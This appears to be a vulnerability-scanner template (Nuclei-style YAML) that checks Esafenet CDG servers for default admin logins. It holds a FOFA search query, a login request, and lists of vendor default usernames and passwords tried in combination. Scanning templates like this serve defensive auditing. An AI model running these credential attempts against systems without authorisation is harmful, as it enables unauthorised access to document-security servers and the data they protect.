57 lines
1.4 KiB
YAML
57 lines
1.4 KiB
YAML
id: esafenet-cdg-default-login
|
|
|
|
info:
|
|
name: Esafenet CDG - Default Login
|
|
author: chesterblue
|
|
severity: high
|
|
description: |
|
|
Esafenet electronic document security management system default credentials were discovered.
|
|
metadata:
|
|
verified: true
|
|
max-request: 32
|
|
fofa-query: esafenet
|
|
tags: esafenet,cdg,default-login
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/CDGServer3/SystemConfig"
|
|
|
|
headers:
|
|
content-type: application/x-www-form-urlencoded
|
|
|
|
body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
|
|
attack: clusterbomb
|
|
payloads:
|
|
username:
|
|
- "systemadmin"
|
|
- "configadmin"
|
|
- "secadmin"
|
|
- "docadmin"
|
|
password:
|
|
- "Est@Spc820"
|
|
- "12345678"
|
|
- "123456"
|
|
- "Est@Spc2018"
|
|
- "Est@Spc2019"
|
|
- "Est@Spc2020"
|
|
- "Est@Spc2021"
|
|
- "Est@Spc2022"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "est.connection.url"
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950
|